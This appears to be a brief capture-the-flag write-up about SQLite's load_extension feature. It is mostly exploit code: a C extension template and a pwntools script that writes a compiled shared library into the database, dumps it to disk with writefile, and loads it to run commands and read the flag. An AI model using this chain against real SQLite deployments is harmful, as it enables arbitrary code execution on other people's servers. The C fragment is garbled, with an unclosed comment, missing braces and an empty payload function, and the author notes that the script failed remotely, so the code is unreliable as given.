There is a new feature for sqlite that allows loading external libcs.
For this challenge, we can create a new lib so we can just load a external lib to execute arbitrary command. exp.c
/* Add your header comment here */
#include <stdio.h>
#include <sqlite3ext.h> /* Do not use <sqlite3.h>! */
/* Insert your extension code here */
#ifdef _WIN32
/* TODO: Change the entry point name so that "extension" is replaced by
** text derived from the shared library filename as follows: Copy every
** ASCII alphabetic character from the filename after the last "/" through
** the next following ".", converting each character to lowercase, and
** discarding the first three characters if they are "lib".
int sqlite3_extension_init(
sqlite3 *db,
char **pzErrMsg,
const sqlite3_api_routines *pApi
int rc = SQLITE_OK;
/* Insert here calls to
** sqlite3_create_function_v2(),
** sqlite3_create_collation_v2(),
** sqlite3_create_module_v2(), and/or
** sqlite3_vfs_register()
** to register the new features that your extension adds.
return rc;
void exp()
//select Load_extension('/lib/x86_64-linux-gnu/libc.so.6','puts');
//select Load_extension('/jailed/readflag','_start');
//select cast("\x01\x02\x03\x04" as text) ;
from pwn import *
#context.terminal = ['tmux', 'splitw', '-h', '-F' '#{pane_pid}', '-P']
# p=process('./pwn')
import binascii
p = remote("",13337)
ru = lambda a: p.readuntil(a)
r = lambda n: p.read(n)
sla = lambda a,b: p.sendlineafter(a,b)
sa = lambda a,b: p.sendafter(a,b)
sl = lambda a: p.sendline(a)
s = lambda a: p.send(a)
sla(b"> ",b"CREATE TABLE images(name TEXT, type TEXT, img BLOB);")
with open("./exp.so",'rb') as f:
dt = f.read()
sla(b"> ",b"INSERT INTO images(name,type,img)")
dt = binascii.hexlify(dt)
sla(b"> ",f"VALUES('icon','jpeg',cast(x'{dt.decode()}' as text));")
sla(b"> ",b"SELECT writefile('./exp.so',img) FROM images WHERE name='icon';")
sla(b"> ",b"select Load_extension('./exp','exp');")
The above script works for the local one but not the remote one. My teammate found another way to compile it and make it work for the remote one.